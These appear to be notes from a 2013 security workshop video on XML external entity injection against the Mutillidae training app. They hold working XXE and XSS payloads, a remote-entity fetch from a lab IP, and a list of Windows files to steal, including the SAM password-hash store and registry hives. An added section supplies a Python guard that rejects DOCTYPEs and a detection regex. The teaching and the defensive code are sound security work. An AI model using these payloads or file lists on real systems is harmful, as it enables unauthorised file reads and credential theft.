Last updated at Mon, 24 Jul 2017 15:50:45 GMT
Title: Video Tutorial: Introduction to XML External Entity Injection
Author: webpwnized
From: ISSA KY Sept 2013 Workshop (Louisville, KY)
Twitter: @webpwnized
This video introduces XML injection to achieve XML external entity injection (XXE) and XML-based cross-site scripting (XSS). The notes used and mentioned in the video are posted below the video.
1. What is XML injection
2. What is an "entity"
3. What is entity injection
4. Cross site scripting with entity injection
5. Determining local execution path
6. Determining privileges of "user"
7. Directory traversal
8. file:/// protocol
9. Local File Inclusion with entity injection
Firefox --> Burp-Suite --> Apache2 --> PHP App Server --> PHP Code --> XML Parser --> PHP --> Apache2 --> Burp-Suite --> Firefox
Basics
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote '"'> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
Information Disclosure
C:\xampp\htdocs\mutillidae\xml-validator.php
file:///C:/xampp/htdocs/mutillidae/xml-validator.php
Try to cause various errors in order to coax information out of the XML parser:
Try to load files that don't exist
Put whitespace before the XML
Send malformed XML
Determine the operating system type and the path at which interpretation is taking place
Cross site scripting
<?xml version="1.0"?><change-log><text><script>alert("FAIL")</script></text></change-log>
<?xml version="1.0"?><change-log><text><script>alert("Hello World")</script></text></change-log>
Local File Inclusion
Try to acquire application configuration files and/or source code files
Try to acquire operating system files
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "robots.txt"> ]><change-log><text>&systemEntity;</text></change-log>
Remote File Inclusion
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY systemEntity SYSTEM "http://192.168.56.102/index.html"> ]><change-log><text>&systemEntity;</text></change-log>
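A server-side guard for the change-log document that the payloads above target, added here as an example; it is not code from the video or from Mutillidae, whose xml-validator.php is written in PHP. It assumes the application only ever expects a bare change-log/text document (the element names come from the notes above; the function names, the DtdRejected class and the looks_like_xxe regex are my own). Refusing the DOCTYPE before any content is parsed stops the internal-entity, SYSTEM file:/// and http:// variants alike, and the same marker check doubles as a detection rule over logged request bodies.

```python
import re
import xml.parsers.expat


class DtdRejected(Exception):
    """The submitted XML carried a DOCTYPE, the only place entities can be declared."""


def parse_change_log(xml_text: str) -> str:
    """Return the character data inside <text>, refusing any DTD up front."""
    parser = xml.parsers.expat.ParserCreate()
    chunks, in_text = [], [False]
    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so no ENTITY is ever seen.
        raise DtdRejected(f"DOCTYPE for {name!r} not allowed")
    def on_external_ref(context, base, sysid, pubid):
        return 0  # never resolve; expat aborts with an external-entity error
    def on_start(tag, attrs):
        in_text[0] = tag == "text"
    def on_end(tag):
        in_text[0] = in_text[0] and tag != "text"
    def on_chars(data):
        if in_text[0]:
            chunks.append(data)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_text, True)  # an exception raised in a handler propagates
    return "".join(chunks)


def is_rejected(xml_text: str) -> bool:
    """True when the guard refuses the document (handy for logging and tests)."""
    try:
        parse_change_log(xml_text)
    except DtdRejected:
        return True
    return False


# Detection over raw request bodies: XML keywords are case-sensitive, so any
# payload the parser would accept must spell these exactly.
XXE_MARKER = re.compile(r"<!(?:DOCTYPE|ENTITY)\b")


def looks_like_xxe(raw_body: str) -> bool:
    return XXE_MARKER.search(raw_body) is not None
```

Entities that are only declared, never referenced, are still refused: the decision is made on the DOCTYPE, not on what the document later does with it.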
Windows XP SP3
%WINDIR% = C:\WINDOWS
%SYSTEMDRIVE% = C:
%SYSTEMROOT% = C:\WINDOWS
Credit: Rob "Mubix" Fuller
file:///C:\WINDOWS\System32\drivers\etc\hosts
%WINDIR%\System32\drivers\etc\hosts
Blind Files
%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every Windows host. Helps confirm that a read is actually happening.
%WINDIR%\win.ini
This is another file to look for if boot.ini isn't there or coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
It stores users' passwords in a hashed format (LM hash and NTLM hash). The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow Copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
Files To Pull (if possible)
%SYSTEMDRIVE%\pagefile.sys
Large file, but it contains spill-over from RAM, so lots of useful information can usually be pulled from it; it should be a last resort due to its size.
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
Location of IIS 7's logs
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts